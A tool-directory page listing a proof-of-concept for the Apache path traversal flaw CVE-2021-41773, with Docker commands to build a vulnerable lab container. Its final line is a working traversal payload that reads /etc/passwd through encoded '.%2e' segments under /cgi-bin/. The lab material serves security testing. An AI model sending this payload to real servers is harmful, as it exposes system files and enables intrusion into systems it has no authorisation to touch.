Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-41773 — CVE-2021-41773 exploit PoC with Docker setup. | Kitploit
Tools/GitHubGitHub/sixpacksecurity/cve-2021-41773
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubsixpacksecurity/cve-2021-41773

CVE-2021-41773

CVE-2021-41773 exploit PoC with Docker setup.

View Repository
4 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-41773 exploit PoC with Docker setup.

CD into the directory containing the Apache configuration and Dockerfile (shared in repo).

Building Image: ~# docker build -t cve-2021-41773:1.0 .

Running the Docker Image: ~# docker run --rm -d -p 4444:80 cve-2021-41773:1.0 (Note: You can also use Image ID instead of image name, find Image details using command 'docker images')

Test service: ~# curl localhost:4444

Exploit service: ~# curl localhost:4444/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd

Download Tool